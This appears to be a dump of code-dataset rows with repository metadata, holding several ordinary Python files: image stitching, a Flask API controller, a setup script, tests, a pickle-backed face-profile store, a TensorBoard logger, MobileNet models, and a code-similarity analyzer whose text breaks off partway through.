seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
16181058653 | import numpy as np
import cv2
import os
import sys
import matplotlib.pyplot as plt
def detect_feature_and_keypoints(image):
    """Run SIFT on a BGR image and return (Nx2 float32 keypoint coords, descriptors)."""
    gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    # SIFT works on grayscale; xfeatures2d requires opencv-contrib.
    sift = cv2.xfeatures2d.SIFT_create()
    kps, descriptors = sift.detectAndCompute(gray, None)
    coords = np.float32([kp.pt for kp in kps])
    return coords, descriptors
def feature_matching(features1, features2, ratio):
    """Brute-force 2-nearest-neighbour matching with Lowe's ratio test.

    For every descriptor in features1, track the two closest descriptors in
    features2 (Euclidean distance); keep the match only when the best distance
    is below ``ratio`` times the second-best.

    Returns a list of ``(index_into_features2, index_into_features1)`` pairs.
    Assumes features2 has at least 2 rows -- TODO confirm at call sites.
    """
    raw_match = []
    match_dist = []
    for i in range(features1.shape[0]):
        # Seed (closest, second) from the first two candidates.  Note: on an
        # exact tie the second candidate wins here, while the loop below keeps
        # the earlier index (strict <) -- order-dependent by design.
        if np.linalg.norm(features1[i] - features2[0]) < np.linalg.norm(features1[i] - features2[1]):
            closest = np.linalg.norm(features1[i] - features2[0])
            second = np.linalg.norm(features1[i] - features2[1])
            c, s = 0, 1
        else:
            closest = np.linalg.norm(features1[i] - features2[1])
            second = np.linalg.norm(features1[i] - features2[0])
            c, s = 1, 0
        for j in range(2, features2.shape[0]):
            dist = np.linalg.norm(features1[i] - features2[j])
            if dist < second:
                if dist < closest:
                    # New best: old best becomes second-best.
                    second = closest
                    closest = dist
                    s = c
                    c = j
                else:
                    second = dist
                    s = j
        raw_match.append((c, s))
        match_dist.append((closest, second))
    valid_match = []
    for i, m in enumerate(raw_match):
        (closest, second) = match_dist[i]
        # to eliminate ambiguous matches
        if closest < ratio * second:
            valid_match.append((m[0], i))
    return valid_match
def drawMatches(image1, image2, keypoints1, keypoints2, matches):
    """Render image1 and image2 side by side with one colored line per match.

    ``matches`` holds ``(idx2, idx1)`` pairs indexing keypoints2 / keypoints1.
    """
    h1, w1 = image1.shape[:2]
    h2, w2 = image2.shape[:2]
    canvas = np.zeros((max(h1, h2), w1 + w2, 3), dtype='uint8')
    canvas[0:h1, 0:w1] = image1
    canvas[0:h2, w1:] = image2
    for (i, j) in matches:
        # A random color per match keeps dense visualizations readable.
        color = np.random.randint(0, high=255, size=(3,))
        color = tuple(int(channel) for channel in color)
        start = (int(keypoints1[j][0]), int(keypoints1[j][1]))
        # Shift x by w1 because image2 sits to the right of image1.
        end = (int(keypoints2[i][0]) + w1, int(keypoints2[i][1]))
        cv2.line(canvas, start, end, color, 1)
    return canvas
def find_Homography(keypoints1, keypoints2, valid_match, threshold):
    """Estimate the homography mapping keypoints1 -> keypoints2 via RANSAC + DLT.

    ``valid_match`` holds ``(idx2, idx1)`` pairs; ``threshold`` is the pixel
    reprojection distance under which a point counts as an inlier.

    NOTE(review): if no iteration produces a single inlier, the all-zeros
    initial ``best_H`` is returned -- callers should guard against that.
    NOTE(review): normalizing by V[-1,-1] divides by zero when that entry is 0.
    """
    points1 = np.float32([keypoints1[i] for (_,i) in valid_match])
    points2 = np.float32([keypoints2[i] for (i,_) in valid_match])
    length = np.shape(points1)[0]
    mapped_points1 = np.zeros(np.shape(points1), dtype=float)
    # Homogeneous coordinates [x, y, 1] for every matched point, built once.
    original_coord = np.concatenate((points1, np.ones((1,np.shape(points1)[0]), dtype=float).T), axis=1)
    S = 4      # minimal sample size for a homography
    N = 2000   # RANSAC iterations
    best_i = 0
    best_H = np.zeros((3,3), dtype=float)
    # RANSAC algorithm to find the best H
    for _ in range(N):
        inliers = 0
        idx = np.random.choice(length, S, replace=False) # sample S index of points
        # compute homography
        # Build the 8x9 DLT system P h = 0 from the 4 sampled correspondences.
        P = np.zeros((S*2,9),np.float32)
        for i in range(S):
            row = i*2
            P[row,:3] = P[row,-3:] = P[row+1,3:6] = P[row+1,-3:] = np.array([points1[idx[i]][0], points1[idx[i]][1], 1.0])
            P[row,-3:] *= -points2[idx[i]][0]
            P[row+1,-3:] *= -points2[idx[i]][1]
        # The solution is the right singular vector of the smallest singular value.
        _, _, V = np.linalg.svd(P)
        H = V[-1,:]/V[-1,-1] # normalize, so H[-1,-1]=1.0
        H = H.reshape((3,3))
        # map points1 from its coordinate to points2 coordinate
        # H @ [x, y, 1].T = lambda * [x', y', 1]
        mapped_coord = original_coord @ H.T
        for i in range(length):
            mapped_points1[i][0] = mapped_coord[i][0] / mapped_coord[i][2]
            mapped_points1[i][1] = mapped_coord[i][1] / mapped_coord[i][2]
            l = np.linalg.norm(mapped_points1[i] - points2[i])
            if l < threshold:
                inliers += 1
        if inliers > best_i:
            best_i = inliers
            best_H = H
    return best_H
def warp(image1, image2, H):
    """Warp image1 into image2's frame via inverse mapping, then paste image2.

    Output is (h1, w1+w2, 3); for every output pixel the inverse homography
    finds the source pixel in image1 (nearest-neighbour sampling).  image2 is
    copied over its own region last, so it always wins where the two overlap.
    NOTE(review): pure-Python per-pixel loop -- O(h2*(w1+w2)) and slow.
    """
    h1, w1, h2, w2 = image1.shape[0], image1.shape[1], image2.shape[0], image2.shape[1]
    inv_H = np.linalg.inv(H)
    result_image = np.zeros((h1, w1 + w2, 3),dtype=np.uint8)
    for i in range(h2):
        for j in range(w1 + w2):
            # H @ [x, y, 1].T = lambda * [x', y', 1]
            # inv_H @ [x, y, 1].T = 1/lambda * [x, y, 1]
            coord2 = np.array([j, i, 1])
            coord1 = inv_H @ coord2
            coord1[0] /= coord1[2]
            coord1[1] /= coord1[2]
            coord1 = np.around(coord1[:2])
            new_i, new_j = int(coord1[0]), int(coord1[1]) # find the closest coordinate
            if new_i>=0 and new_j>=0 and new_i<w1 and new_j<h1: # check boundary
                result_image[i][j] = image1[new_j][new_i] # get the pixel values in image1, and map it to the result_image
    result_image[0:h2, 0:w2] = image2
    return result_image
def images_stitching(image1,image2, ratio, threshold):
    """Stitch two overlapping images into a panorama.

    NOTE(review): the roles are swapped internally on purpose -- keypoints1
    comes from image2 and keypoints2 from image1, so the homography maps
    image2 into image1's frame before warping.
    """
    keypoints1, features1 = detect_feature_and_keypoints(image2)
    keypoints2, features2 = detect_feature_and_keypoints(image1)
    valid_match = feature_matching(features1, features2, ratio)
    # vis (the match visualization) is computed but not returned/used here.
    vis = drawMatches(image2, image1, keypoints1, keypoints2, valid_match)
    H = find_Homography(keypoints1, keypoints2, valid_match, threshold)
    result_image = warp(image2, image1, H)
    return result_image
def change_size(image):
    """Crop away the all-black border columns produced by warping.

    Median-blurs and thresholds *image*, then keeps only the column span that
    contains at least one white (non-black) pixel.  Row extent is unchanged,
    matching the original behaviour, which cropped columns only.

    Raises ValueError if the thresholded image contains no white pixel
    (same failure mode as the original ``min([])``).
    """
    # delete black region
    img = cv2.medianBlur(image, 5)
    binary_image = cv2.threshold(img, 15, 255, cv2.THRESH_BINARY)[1]
    binary_image = cv2.cvtColor(binary_image, cv2.COLOR_BGR2GRAY)
    # Vectorized scan replaces the original O(H*W) Python double loop; the
    # original's row-based left/right/width values were dead code and dropped.
    _, white_cols = np.where(binary_image == 255)
    bottom = int(white_cols.min())
    height = int(white_cols.max()) - bottom
    return image[:, bottom:bottom + height]
def repair(img):
    """Inpaint pure-black pixels (holes left by warping) with Telea's method.

    :param img: BGR uint8 image
    :return: inpainted copy of *img*
    """
    # Mask is 255 where all three channels are exactly 0 -- vectorized
    # replacement for the original per-pixel Python loop.
    mask = (np.all(img == 0, axis=2).astype(np.uint8)) * 255
    dst = cv2.inpaint(img, mask, 30, cv2.INPAINT_TELEA)
    return dst
def read_directory(directory_name):
    """Load ``1.jpg`` .. ``N.jpg`` from *directory_name* in numeric order.

    N is the count of regular files in the directory.  Unreadable or missing
    images (``cv2.imread`` returns None) are skipped with a warning instead of
    propagating ``None`` into the result, which previously crashed stitching.
    """
    array_of_img = []
    filenumber = len([name for name in os.listdir(directory_name) if os.path.isfile(os.path.join(directory_name, name))])
    for i in range(1, filenumber + 1):
        path = os.path.join(directory_name, str(i) + ".jpg")
        img = cv2.imread(path)
        if img is None:
            print("Warning: could not read " + path + ", skipping.")
            continue
        array_of_img.append(img)
    return array_of_img
if __name__ == '__main__':
    root = os.path.join('data')
    # images = []
    # directory_name = 'data'
    # images = read_directory(directory_name)
    # ratio = 0.75 # recommend 0.7 to 0.8
    # threshold = 4.0 # recommend 0 to 10
    # result_image = images[0]
    # for i in range(1,len(images)):
    #     result_image = images_stitching([images[i],result_image], ratio, threshold)
    # result_image = change_size(result_image)
    # result_image = repair(result_image)
    # cv2.imshow("image",result_image)
    # cv2.waitKey (0)
    # cv2.destroyAllWindows()
    # cv2.imwrite("./result"+directory_name+".jpg",result_image)
    ratio = 0.75 # recommend 0.7 to 0.8
    threshold = 4.0 # recommend 0 to 10
    # NOTE(review): '1.jpg'/'2.jpg' appear twice, and range(4) below skips the
    # fifth pair entirely -- confirm which image sets were meant to run.
    images1 = np.array(['1.jpg','hill1.JPG','S1.jpg','1.jpg','P1.jpg'])
    images2 = np.array(['2.jpg','hill2.JPG','S2.jpg','2.jpg','P2.jpg'])
    for i in range(4):
        img1 = cv2.imread(os.path.join(root, images1[i]))
        img2 = cv2.imread(os.path.join(root, images2[i]))
        result_image = images_stitching(img1,img2, ratio, threshold)
        # Output file is written to the current directory (single-arg join).
        cv2.imwrite(os.path.join(f'{images1[i]}+{images2[i]}.jpg'), result_image)
        #cv2.imshow('result_nature.jpg', result_image)
        # Convert BGR -> RGB for matplotlib display.
        result_image = cv2.cvtColor(result_image, cv2.COLOR_BGR2RGB)
        plt.imshow(result_image)
        plt.show()
| Jackkuoo/CV | HW3/CV_HW3_3_309505018/stitch.py | stitch.py | py | 8,361 | python | en | code | 0 | github-code | 50 |
26526685783 | from flask import jsonify, request
from controller import app, db
from service.authenticate import jwt_required
from model.valid_database_model import ValidDatabase, valid_databases_share_schema
@ app.route('/getValidDatabases', methods=['GET'])
@ jwt_required
def getValidDatabases(current_user):
    """Return every registered valid database as JSON.  Requires a valid JWT.

    :return: (JSON list of databases, 200) on success,
             (error message, 400) if serialization/query fails.
    """
    try:
        result = valid_databases_share_schema.dump(
            ValidDatabase.query.all()
        )
        return jsonify(result), 200
    except Exception:
        # Was a bare ``except:``, which would also trap SystemExit /
        # KeyboardInterrupt; narrowed to Exception.
        return jsonify({
            'message': 'valid_databases_invalid_data'
        }), 400
@ app.route('/addValidDatabase', methods=['POST'])
@ jwt_required
def addValidDatabase(current_user):
    """Create a new ValidDatabase row from the JSON body's ``name`` field.

    :return: (success message, 200) or (error message, 400).
    """
    try:
        name = request.json.get('name')
        valid_database = ValidDatabase(name=name)
        db.session.add(valid_database)
        db.session.commit()
        return jsonify({
            'message': 'valid_database_added'
        }), 200
    except Exception:
        # Was a bare ``except:``; also roll back so the session stays usable
        # after a failed insert/commit.
        db.session.rollback()
        return jsonify({
            'message': 'valid_database_invalid_data'
        }), 400
| FRIDA-LACNIC-UECE/back-end | api/controller/valid_database_controller.py | valid_database_controller.py | py | 1,024 | python | en | code | 0 | github-code | 50 |
39333877966 | #!/usr/bin/python2
"""
JSON Tokens
==============
"""
from setuptools import setup, find_packages
import unittest
def get_test_suite():
    """Discover and return the suite of tests in files named ``unit_tests.py``."""
    loader = unittest.TestLoader()
    return loader.discover('.', pattern='unit_tests.py')
# Package metadata for the jsontokens distribution (JSON Web Token library).
setup(
    name='jsontokens',
    version='0.0.4',
    url='https://github.com/blockstack/jsontokens-py',
    license='MIT',
    author='Blockstack Developers',
    author_email='hello@onename.com',
    description=("JSON Web Token Python Library"),
    keywords='json web token sign verify encode decode signature',
    packages=find_packages(),
    zip_safe=False,
    # Tests come from the discover helper defined above in this file.
    test_suite="setup.get_test_suite",
    install_requires=[
        'cryptography>=1.9',
        'keylib>=0.1.1',
    ],
    classifiers=[
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Topic :: Internet',
        'Topic :: Security :: Cryptography',
        'Topic :: Software Development :: Libraries :: Python Modules',
    ]
)
| blockstack-packages/jsontokens-py | setup.py | setup.py | py | 1,113 | python | en | code | 9 | github-code | 50 |
34355928097 | from unittest.mock import MagicMock
from entrypoint import DynDNS
import pytest
@pytest.fixture
def main_obj():
    """DynDNS instance whose Route53 client is replaced by a MagicMock."""
    obj = DynDNS()
    obj.r53 = MagicMock()
    return obj
def test_get_hosted_zone(main_obj):
    """_get_hosted_zone_id returns the Id of the zone whose name matches."""
    main_obj.r53.list_hosted_zones.return_value={
        "HostedZones": [{
            "Id": "boston",
            "Name": 'something.com.'
        }]
    }
    # NOTE(review): domain_name/hosted_zone appear swapped relative to
    # test_init below -- confirm which attribute the lookup keys on.
    main_obj.domain_name = 'mything.something.com'
    main_obj.hosted_zone = 'something.com'
    assert main_obj._get_hosted_zone_id() == 'boston'
def test_init(monkeypatch):
    """Constructor reads HOSTED_ZONE and DOMAIN_NAME from the environment."""
    monkeypatch.setenv('HOSTED_ZONE', 'mything.something.com')
    monkeypatch.setenv('DOMAIN_NAME', 'something.com')
    main_obj = DynDNS()
    assert main_obj.domain_name == 'something.com'
    assert main_obj.hosted_zone == 'mything.something.com'
# def test_start(monkeypatch):
# monkeypatch.setenv('HOSTED_ZONE', 'kloudcover.com')
# monkeypatch.setenv('DOMAIN_NAME', 'vpn.kloudcover.com')
# obj = DynDNS()
# obj.start()
| ktruckenmiller/aws-docker-dynamic-dns | test_entrypoint.py | test_entrypoint.py | py | 990 | python | en | code | 0 | github-code | 50 |
23188207488 |
import pickle
import generating_descriptors as gd
import Profile
def load_db(pathname):
    """
    Return the profile database stored in the pickle file at *pathname*.

    Parameters
    ----------
    pathname: string

    Returns
    -------
    database: dictionary mapping names to profiles
    """
    with open(pathname, mode="rb") as handle:
        return pickle.load(handle)
def save_db(database, pathname):
    """
    Serialize *database* to the pickle file at *pathname*.

    Parameters
    ----------
    database: dictionary
    pathname: string
    """
    with open(pathname, mode="wb") as handle:
        pickle.dump(database, handle)
def add_profile(profile, pathname="database.pkl"):
    """
    Add *profile* to the on-disk database under ``profile.name``.

    Parameters
    ----------
    profile: Profile of the person to add
    pathname: string, optional
        Pickle file holding the database; previously hard-coded, now a
        parameter with the same default for backward compatibility.
    """
    database = load_db(pathname)
    database[profile.name] = profile
    save_db(database, pathname)
def remove_profile(profile, pathname="database.pkl"):
    """
    Remove *profile* from the on-disk database.

    Parameters
    ----------
    profile: Profile of the person to remove
    pathname: string, optional
        Pickle file holding the database (default "database.pkl").

    Raises KeyError if the profile is not in the database (unchanged behavior).
    """
    database = load_db(pathname)
    database.pop(profile.name)
    save_db(database, pathname)
def add_image(img, name, pathname="database.pkl"):
    """
    Add the face descriptor extracted from *img* to *name*'s profile,
    creating the profile if it does not exist yet.

    Parameters
    ----------
    img: string - pathname of image
    name: string - name of person to add to
    pathname: string, optional - pickle file holding the database
    """
    # Uses the first detected face only -- assumes a single-face image;
    # TODO confirm with find_faces' contract.
    descriptor = gd.find_faces(img)[0]
    database = load_db(pathname)
    if name not in database:
        database[name] = Profile.Profile(name)
    database[name].add_face_descriptor(descriptor)
    save_db(database, pathname)
| armaan-v924/computer-vision-capstone | database_functions.py | database_functions.py | py | 1,787 | python | en | code | 1 | github-code | 50 |
24076526190 | import tensorflow as tf
import numpy as np
import traceback
import torch
import os
class Logger(object):
    """
    TensorBoard logger that also checkpoints the best model weights.
    """
    def __init__(self, log_dir, save_weight):
        """
        Create a summary writer logging to log_dir.
        :param log_dir: str: directory for TensorBoard event files (created if missing)
        :param save_weight: str: directory in which model checkpoints are written
        """
        if not os.path.isdir(log_dir):
            # makedirs also creates missing parent directories (mkdir did not).
            os.makedirs(log_dir)
        self.writer = tf.summary.FileWriter(log_dir)
        self.root = save_weight
        self.best_acc = 0

    def save_checkpoint(self, val_acc, model, optimizer, cur_epoch, cur_snap, cur_fold):
        """
        Save the network state when validation accuracy improves.
        :param val_acc: validation accuracy for this epoch
        :param model: network module whose state_dict is saved
        :param optimizer: optimizer whose state_dict is saved
        :param cur_epoch: int: current training epoch
        :param cur_snap: snapshot index used in the checkpoint filename
        :param cur_fold: fold index used in the checkpoint filename
        :return: bool: True on success (improved or not), False on error
        """
        try:
            if val_acc > self.best_acc:
                print('Saving model with validation accuracy:', val_acc)
                torch.save({
                    'epoch': cur_epoch,
                    'model_state_dict': model.state_dict(),
                    'optimizer_state_dict': optimizer.state_dict()
                    # Fixed: was ``self.save_weight``, an attribute that is
                    # never set (the constructor stores it as ``self.root``),
                    # which raised AttributeError on every save.
                }, os.path.join(self.root, f's{cur_snap}_' + f'f{cur_fold}_' + 'checkpoint.pth'))
                self.best_acc = val_acc
            # Fixed: previously returned None (not False/True) when accuracy
            # did not improve, contradicting the documented contract.
            return True
        except Exception:
            print('Ошибка:\n', traceback.format_exc())
            return False

    def scalar_summary(self, tag, value, step):
        """Log a scalar variable."""
        summary = tf.Summary(value=[tf.Summary.Value(tag=tag, simple_value=value)])
        self.writer.add_summary(summary, step)

    def hist_summary(self, tag, values, step, bins=1000):
        """Log a histogram of the tensor of values."""
        # Create a histogram using numpy
        counts, bin_edges = np.histogram(values, bins=bins)
        # Fill the fields of the histogram proto
        hist = tf.HistogramProto()
        hist.min = float(np.min(values))
        hist.max = float(np.max(values))
        hist.num = int(np.prod(values.shape))
        hist.sum = float(np.sum(values))
        hist.sum_squares = float(np.sum(values ** 2))
        # Drop the start of the first bin
        bin_edges = bin_edges[1:]
        # Add bin edges and counts
        for edge in bin_edges:
            hist.bucket_limit.append(edge)
        for c in counts:
            hist.bucket.append(c)
        # Create and write Summary
        summary = tf.Summary(value=[tf.Summary.Value(tag=tag, histo=hist)])
        self.writer.add_summary(summary, step)
        self.writer.flush()
31761205091 | from torch import nn
import torch
# 在模型结构中需要体现α
class DepthwiseSeparableConv(nn.Module):
    """Depthwise-separable convolution: depth-wise 3x3 followed by point-wise 1x1.

    ``alpha`` is the MobileNet width multiplier applied to both channel counts.
    Attribute names (conv1/bn1/... ) are kept so state_dict keys are unchanged.
    """

    def __init__(self, in_channel, out_channel, stride=1, alpha=1.):
        super().__init__()
        scaled_in = int(alpha * in_channel)
        scaled_out = int(alpha * out_channel)
        # Depth-wise: one 3x3 filter per input channel (groups == channels);
        # the stride of the whole block lives here.
        self.conv1 = nn.Conv2d(scaled_in, scaled_in, kernel_size=3, padding=1,
                               stride=stride, bias=False, groups=scaled_in)
        self.bn1 = nn.BatchNorm2d(scaled_in)
        self.relu1 = nn.ReLU()
        # Point-wise: 1x1 convolution mixes information across channels.
        self.conv2 = nn.Conv2d(scaled_in, scaled_out, kernel_size=1, bias=False)
        self.bn2 = nn.BatchNorm2d(scaled_out)
        self.relu2 = nn.ReLU()

    def forward(self, x):
        x = self.relu1(self.bn1(self.conv1(x)))
        return self.relu2(self.bn2(self.conv2(x)))
class MobileNet(nn.Module):
    """MobileNet-v1 style 2-class classifier with width multiplier ``alpha``."""

    # (attribute name, in_channels, out_channels, stride) for each separable
    # block; attribute names are preserved so state_dict keys stay compatible.
    _DS_CFG = [
        ("ds_conv_1", 32, 64, 1),
        ("ds_conv_2", 64, 128, 2),
        ("ds_conv_3", 128, 128, 1),
        ("ds_conv_4", 128, 256, 2),
        ("ds_conv_5", 256, 256, 1),
        ("ds_conv_6", 256, 512, 2),
        ("ds_conv_7_1", 512, 512, 1),
        ("ds_conv_7_2", 512, 512, 1),
        ("ds_conv_7_3", 512, 512, 1),
        ("ds_conv_7_4", 512, 512, 1),
        ("ds_conv_7_5", 512, 512, 1),
        ("ds_conv_8", 512, 1024, 2),
        ("ds_conv_9", 1024, 1024, 2),
    ]

    def __init__(self, alpha=1.):
        super().__init__()
        # Stem: the only standard (non-separable) convolution.
        self.conv = nn.Conv2d(3, int(alpha * 32), kernel_size=3, padding=1, stride=2, bias=False)
        self.bn = nn.BatchNorm2d(int(alpha * 32))
        self.relu = nn.ReLU(inplace=True)
        for attr, cin, cout, stride in self._DS_CFG:
            setattr(self, attr, DepthwiseSeparableConv(in_channel=cin, out_channel=cout, stride=stride, alpha=alpha))
        self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))
        self.fc = nn.Linear(int(alpha * 1024), 2)

    def get_param_num(self):
        """Return the total number of parameters in the network."""
        return sum(param.numel() for param in self.parameters())

    def forward(self, x):
        x = self.relu(self.bn(self.conv(x)))
        for attr, *_ in self._DS_CFG:
            x = getattr(self, attr)(x)
        x = self.avg_pool(x)
        x = x.reshape(x.shape[0], -1)
        return self.fc(x)
class Normal_Conv(nn.Module):
    """Plain-convolution counterpart of MobileNet, used to compare parameter counts.

    Attribute names (blk1..blk6) are kept so state_dict keys are unchanged.
    """

    def __init__(self):
        super().__init__()
        self.blk1 = blk(3, 32, stride=2)
        self.blk2 = nn.Sequential(blk(32, 64, stride=1), blk(64, 128, stride=2))
        self.blk3 = nn.Sequential(blk(128, 128, stride=1), blk(128, 256, stride=2))
        self.blk4 = nn.Sequential(blk(256, 256, stride=1), blk(256, 512, stride=2))
        # Five identical stride-1 512-channel blocks.
        self.blk5 = nn.Sequential(*[blk(512, 512, stride=1) for _ in range(5)])
        self.blk6 = nn.Sequential(blk(512, 1024, stride=2), blk(1024, 1024, stride=2))
        self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))
        self.fc = nn.Linear(1024, 2)

    def forward(self, x):
        for stage in (self.blk1, self.blk2, self.blk3, self.blk4, self.blk5, self.blk6):
            x = stage(x)
        x = self.avg_pool(x)
        x = x.reshape(x.shape[0], -1)
        return self.fc(x)

    def get_param_num(self):
        """Return the total number of parameters in the network."""
        return sum(param.numel() for param in self.parameters())
class blk(nn.Module):
    """Conv3x3 -> BatchNorm -> ReLU building block (parameter name ``ouu_channel``
    kept as-is for keyword-argument compatibility)."""

    def __init__(self, in_channel, ouu_channel, stride):
        super().__init__()
        self.net = nn.Sequential(
            nn.Conv2d(in_channel, ouu_channel, kernel_size=3, padding=1, stride=stride, bias=False),
            nn.BatchNorm2d(ouu_channel),
            nn.ReLU(),
        )

    def forward(self, x):
        return self.net(x)
if __name__ == '__main__':
    # Compare parameter counts of the separable vs. plain networks.
    torch.manual_seed(1)
    # NOTE(review): assumes a CUDA device is available -- crashes on CPU-only
    # machines; only construction/counting happens, so cuda is not required.
    device = torch.device('cuda')
    x = torch.randn(size=(1,3,224,224),device=device)
    net1 = MobileNet(1).to(device)
    print(net1.get_param_num())
    net = Normal_Conv().to(device)
    print(net.get_param_num())
1937713173 | '''
'PYTHON CODE SIMILARITY ANALYZER'
Created for the course of Artificial Intelligence,
taught by Sir Sikandar Khan at SZABIST.
Authors:
Esha Rashid CS-1812262
Hamza Hussain CS-1812264
'''
import ast
import astor
import math
import json
import re
from difflib import SequenceMatcher
from difflib import unified_diff
# Result payload filled in by Unified_Diff_Algorithm (tree-level similarity).
JsonObject = {
    "lines" : '',
    "length" : '',
    "disSimilarity" : '',
    "probableSimilarity" : '',
    "modify" : '',
    "ratio" : '',
    "index" : '',
    "tree" : '',
    "i" : 0
}
# Result payload filled in by analyseNodes (node-category similarities, %).
JsonObjectTwo = {
    "similarExpressions" : 0.0,
    "similarAssignments" : 0.0,
    "similarIterators" : 0.0,
    "similarFunctions" : 0.0,
    "similarIdentifiers" : 0.0
}
# Module-level accumulators shared between the NodeVisitor and the compare
# functions.  ``*_helper`` lists are filled during a visit and then swapped
# into the ``*_1`` / ``*_2`` slots by analyseNodes.
expr = []
expr_2 = []
expr_helper = []
collect_if_helper = []
collect_assign_1 = []
collect_assign_2 = []
collect_assign_helper = []
collect_call_1 = []
collect_call_2 = []
collect_call_helper = []
collect_for_1 = []
collect_for_2 = []
collect_for_helper = []
targetsOne = []
targetsTwo = []
targets = []
'''
Helper functions are defined here
'''
def nearestTen(a, b):
    """Round the larger of *a* and *b* to the nearest multiple of ten.

    Uses Python's banker's rounding, so e.g. nearestTen(25, 10) == 20.
    """
    return 10 * round(max(a, b) / 10)
def compareNodes(array_one, array_two):
    """Percentage of equal pairs in the cross product of the two lists,
    relative to the length of the longer list (0 when both are empty).

    Note that duplicated elements can push the result past 100 -- this
    mirrors the original counting scheme exactly.
    """
    if len(array_one) > len(array_two):
        longer, shorter = array_one, array_two
    else:
        longer, shorter = array_two, array_one
    if not longer:
        return 0
    hits = sum(1 for a in longer for b in shorter if a == b)
    return round(hits / len(longer) * 100, 2)
def compareIdentifiers(array_one, array_two):
    """Percentage of identifiers in the longer list that also occur in the
    shorter list (each element counted at most once; 0 when both empty)."""
    if len(array_one) > len(array_two):
        longer, shorter = array_one, array_two
    else:
        longer, shorter = array_two, array_one
    if not longer:
        return 0
    hits = sum(1 for name in longer if name in shorter)
    return round(hits / len(longer) * 100, 2)
def compareExpr():
    """Compare the module-level BinOp collections ``expr`` and ``expr_2``.

    Each entry is a [left, op, right] triple of dumped AST parts; two
    expressions count as similar when at least 2 of the 3 parts match.
    Returns the similar-pair count as a percentage of the larger collection.

    Fix: removed the debug ``print`` statements that dumped every matching
    pair to stdout.
    """
    if len(expr) > len(expr_2):
        start_1 = len(expr)
        start_2 = len(expr_2)
        expr_bigger = True
    else:
        start_1 = len(expr_2)
        start_2 = len(expr)
        expr_bigger = False
    if start_1 == 0:
        return 0
    ratio = 0
    for i in range(start_1):
        for j in range(start_2):
            # i always indexes the larger collection, j the smaller one.
            match = 0
            for k in range(3):
                if expr_bigger:
                    if expr_2[j][k] == expr[i][k]:
                        match = match + 1
                else:
                    if expr_2[i][k] == expr[j][k]:
                        match = match + 1
            if match >= 2:
                ratio = ratio + 1
    return (ratio / start_1) * 100
'''
Node Transformer Class
AST's own class NodeTransformer is used to normalize the AST
Get rid of unimportant information
and information specific to the nodes.
Node Visitor Class
Below this is the NodeVisitor class, to traverse the tree
and extract useful details to compare later.
'''
class nodeTransformer(ast.NodeTransformer):
    """Normalizes an AST before comparison by stripping identifier-specific
    details (variable names, attribute names) and dropping import statements,
    so that renamed-but-equivalent code produces the same dumped tree."""
    def visit_Name(self, node):
        # Drop the variable name; only the Name node's shape remains.
        if hasattr(node, 'id'):
            del node.id
        self.generic_visit(node)
        return node
    def visit_Assign(self, node):
        # if hasattr(node, 'ctx'):
        #     del node.ctx
        if hasattr(node, 'type_comment'):
            del node.type_comment
        for target in node.targets:
            if isinstance(target, ast.Name):
                del target.id
        del node.targets
        self.generic_visit(node)
        return node
    def visit_Attribute(self, node):
        del node.attr
        del node.ctx
        self.generic_visit(node)
        return node
    def visit_For(self, node):
        # ``node.target`` is a bare expression statement -- intentional no-op.
        node.target
        self.generic_visit(node)
        return node
    def visit_Import(self, node):
        # Returning None removes import nodes from the tree entirely.
        pass
    def visit_ImportFrom(self, node):
        pass
    def visit_Call(self, node):
        # Zero-argument calls lose their (empty) args/keywords lists.
        if hasattr(node, 'args'):
            if len(node.args) == 0:
                del node.args
                del node.keywords
        self.generic_visit(node)
        return(node)
class nodeVisitor(ast.NodeVisitor):
    """Walks an AST and collects comparable summaries of identifiers,
    assignments, binary expressions, comparisons, for-loops and calls into
    the module-level ``*_helper`` / ``targets`` accumulators."""
    def visit_Name(self, node):
        # Every identifier occurrence is recorded for compareIdentifiers.
        targets.append(node.id)
    def visit_Assign(self, node):
        # Summary: [target names..., constant value if present].
        this_assignment = []
        for target in node.targets:
            if isinstance(target, ast.Name):
                if hasattr(target, 'id'):
                    this_assignment.append(target.id)
        if hasattr(node, 'value'):
            if hasattr(node.value, 'value'):
                this_assignment.append(node.value.value)
        collect_assign_helper.append(this_assignment)
    def visit_BinOp(self, node):
        # Summary: [dumped left, dumped op, dumped right] -- compareExpr
        # later calls two parts matching "similar".
        this_expr = []
        # this_expr.append(astor.dump_tree(node))
        this_expr.append(astor.dump_tree(node.left))
        this_expr.append(astor.dump_tree(node.op))
        this_expr.append(astor.dump_tree(node.right))
        expr_helper.append(this_expr)
        self.generic_visit(node)
    def visit_Compare(self, node):
        # Summary: [left id/constant, dumped operators, comparator values].
        this_comparer = []
        if hasattr(node.left, 'id'):
            this_comparer.append(node.left.id)
        elif hasattr(node.left, 'value'):
            this_comparer.append(node.left.value)
        this_comparer.append(astor.dump_tree(node.ops))
        for c in node.comparators:
            if hasattr(c, 'id'):
                this_comparer.append(node.left.id)
            elif hasattr(c, 'value'):
                this_comparer.append(c.value)
        collect_if_helper.append(this_comparer)
    def visit_For(self, node):
        # Summary: [loop variable, dumped iterable].
        this_for = []
        if hasattr(node.target, 'id'):
            this_for.append(node.target.id)
        this_for.append(astor.dump_tree(node.iter))
        # print(node.iter.id)
        collect_for_helper.append(this_for)
    def visit_Call(self, node):
        # Summary: [callee name, argument values/ids/dumps...].
        this_call = []
        # print(astor.dump_tree(node.func))
        if hasattr(node.func, 'id'):
            this_call.append(node.func.id)
        for arg in node.args:
            if hasattr(arg, 'value'):
                this_call.append(arg.value)
            elif hasattr(arg, 'id'):
                this_call.append(arg.id)
            else:
                this_call.append(astor.dump_tree(arg))
        collect_call_helper.append(this_call)
        self.generic_visit(node)
'''
Unified Diff Algorithm
use of unified_diff from the difflib library,
mainly to identify disimilarity and average out the similarity of
longest common sequence and the probable similarity in the code.
'''
def Unified_Diff_Algorithm(treeOne, treeTwo):
    """Compare two normalized ASTs with difflib's unified diff and fill the
    module-level ``JsonObject`` with similarity/dissimilarity figures.

